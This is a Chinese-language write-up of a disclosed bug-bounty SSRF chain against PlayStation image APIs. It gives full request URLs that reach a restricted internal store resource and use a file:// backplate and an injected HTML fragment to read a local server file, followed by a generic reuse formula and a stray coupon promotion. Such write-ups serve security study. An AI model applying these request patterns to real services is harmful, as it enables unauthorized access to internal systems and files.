ssrf攻击链
本文有点烧脑,但是这里笔者把整个逻辑理出来了,下面来看看。
前提:
发现下面两个接口是存在ssrf问题的:
https://image.api.np.km.playstation.net/dis/images
https://image.api.np.km.playstation.net/images
上面这两个接口非常重要,后面将会用到
发现某个请求的响应是403,请求url如下所示:
https://store.mgmt.playstation.com/store/api/chihiro/00_09_000/container/US/en/999/UP4134-CUSA00329_00-ONNTGAME00000001/1429722215000/image?_version=00_09_000&platform=chihiro&w=225&h=225&bg_color=000000&opacity=100
由于响应是403,这可能是一个内部资源,怎么办?继续看:
https://image.api.np.km.playstation.net/images/?format=png&image=https%3a//store.mgmt.playstation.com/store/api/chihiro/00_09_000/container/US/en/999/UP4134-CUSA00329_00-ONNTGAME00000001/1429722215000/image%3f_version%3d00_09_000%26platform%3dchihiro%26w%3d225%26h%3d225%26bg_color%3d000000%26opacity%3d100即:
https://image.api.np.km.playstation.net/images/?format=png&image=https://store.mgmt.playstation.com/store/api/chihiro/00_09_000/container/US/en/999/UP4134-CUSA00329_00-ONNTGAME00000001/1429722215000/image?_version=00_09_000&platform=chihiro&w=225&h=225&bg_color=000000&opacity=100
攻击者随后尝试通过另一个外部可访问的API端点(如 https://image.api.np.km.playstation.net/images/
)来请求这个受限资源。此端点的设计目的是从提供的URL中获取图片,转换其格式,并将其返回给请求者。
通过SSRF端点绕过权限:如果 image.api.np.km.playstation.net
有权访问 store.mgmt.playstation.com
或者没有适当的安全限制来阻止此类请求,这种SSRF请求可能成功获得并返回原本受限的图片。
这里的逻辑是:
https://image.api.np.km.playstation.net/images/?format=png&image=内部资源链接或者
https://image.api.np.km.playstation.net/dis/images/?format=png&image=内部资源链接
下面继续:
又发现了一个内部主机(响应为超时),为我们给定的文本(PhantomJs)提供远程图像,在进一步的分析中,发现这个服务也可以利用文件协议
https://dis.api.np.playstation.net/dis/v1/banners?backplate=https://homer.dl.playstation.net/pr/bam-art/272/352/44592b67-85ac-41d6-b310-334363c5ea58.jpg&dimensions=790x250&price=$36.99&price_discount=$24.41&format[]=PS4&type=Full Game&locale=en_CA&cta=Download Now!&output=png&tpl=banner-web-store&store=game®ion=us&
利用前面总结出来的逻辑来实现漏洞利用:
https://image.api.np.km.playstation.net/dis/images/?format=png&image=https%3A%2F%2Fdis.api.np.playstation.net%2Fdis%2Fv1%2Fbanners%3Fbackplate%3Dfile:////usr/share/pixmaps/system-logo-white.png%26dimensions%3D790x250%26price%3D%2436.99%26price_discount%3D%2424.41%26format%5B%5D%3DPS4%26type%3DF%22%3e%3c%73%3eull+Game%26locale%3Den_CA%26cta%3DDownload+No%26output%3Dsvg%26tpl%3Dbanner-web-store%26store%3Dgame%26region%3Dus%26即:
https://image.api.np.km.playstation.net/dis/images/?format=png&image=https://dis.api.np.playstation.net/dis/v1/banners?backplate=file:////usr/share/pixmaps/system-logo-white.png&dimensions=790x250&price=$36.99&price_discount=$24.41&format[]=PS4&type=F"><s>ull Game&locale=en_CA&cta=Download No&output=svg&tpl=banner-web-store&store=game®ion=us&
我们这里总结出一个公式套路:
#get请求
https://存在ssrf的目标/获取images的接口/parameter=内部资源
参数和接口可以通过文档、抓包进行流量分析、错误消息和api响应等方式方法来获取
前面有同学问我有没优惠券,这里发放100张100元的优惠券,用完今年不再发放
https://hackerone.com/reports/826097